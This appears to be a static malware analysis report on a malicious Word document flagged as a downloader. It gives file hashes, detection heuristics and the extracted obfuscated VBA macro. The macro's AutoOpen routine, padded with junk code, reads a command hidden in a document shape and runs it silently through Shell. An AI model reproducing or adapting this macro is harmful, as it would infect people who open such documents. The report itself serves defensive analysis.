Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bc4fa4a08c51326d…

MALICIOUS

Office (OLE)

Size: 75.1 KB
Created: 2018-11-22 21:11:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: e34188a3eccf9cd3eaee2d282b192e86
SHA-1: a02f774e4d5135fdb986c3dbdb65869f1c8ce452
SHA-256: bc4fa4a08c51326daadd3263ea3cce5735bad48bacd2885f153bb1a8f694ca92
Risk Score: 142

Heuristics (5)

  • ClamAV: Doc.Downloader.Generic-6757155-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6757155-0
  • VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS
    Document contains VBA macro code.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project contains an AutoOpen macro, which runs when the document is opened.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (source: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2205 bytes
SHA-256: 470f7fa12f82caca922771f07b2267f0e972e8333b58542634c79e7cd66c02d7

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "jwBqQrUtJIEw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Select Case XwIkTFuiH
         Case 196957860
            rcYSFU = Rnd(fCraiQdXM)
            fzWZzz = zHCLK
            hpHmotdL = Log(206997938)
      End Select
   Select Case uQKsiTPUN
         Case 311631574
            zPSSJV = Rnd(zmKhiKniW)
            DUbGXju = YNRsFN
            zwhAcwHhi = Log(221760974)
      End Select
Set MhzFzzsR = Shapes("CXrwIjwAM")
   Select Case UOobHZ
         Case 248445099
            jUscKzhfd = Rnd(EijrOShw)
            IBWiB = AkzJfwM
            fivwjKwas = Log(44611759)
      End Select
   Select Case ASDSVGaf
         Case 110236149
            qYMzQJUz = Rnd(DSzNpjZ)
            tvdLDi = HzsuazEN
            oNSKZiTMo = Log(9026880)
      End Select
   Select Case hRDmPYuP
         Case 315693242
            lQhDWIWz = Rnd(CInWlNuV)
            bDFApfH = YiHitCIPu
            zEBUjWrZa = Log(299690131)
      End Select
nmjzlnzzCzN = "" + hcAWt + dsJmqG + MhzFzzsR.TextFrame.TextRange.Text + iWwor + ISVBm + JPhZOSH
   Select Case mHTouonRm
         Case 304271720
            TREiEo = Rnd(JjInvNhr)
            jYlQmE = wmldw
            RRwSj = Log(238094357)
      End Select
   Select Case SkWBw
         Case 182811966
            huCfj = Rnd(dFKuDiza)
            OzuQJBR = MjLOsIYnk
            zljjwlr = Log(227821814)
      End Select
   Select Case VzCOl
         Case 98347948
            VWqGj = Rnd(JWXZaqF)
            upJRnp = iATwnZbjA
            hvQnzj = Log(284343370)
      End Select
Interaction.Shell! nmjzlnzzCzN, 0
   Select Case qzNXzTw
         Case 26267060
            NbtEnW = Rnd(GqWfUOopn)
            KlZOFIRN = EvCdRndIw
            nswdi = Log(328313285)
      End Select
   Select Case LBCKitzQ
         Case 1513416
            VPpjPz = Rnd(nmPfB)
            jXfmtvNs = FtpsI
            MXtWZnuji = Log(229933552)
      End Select
End Sub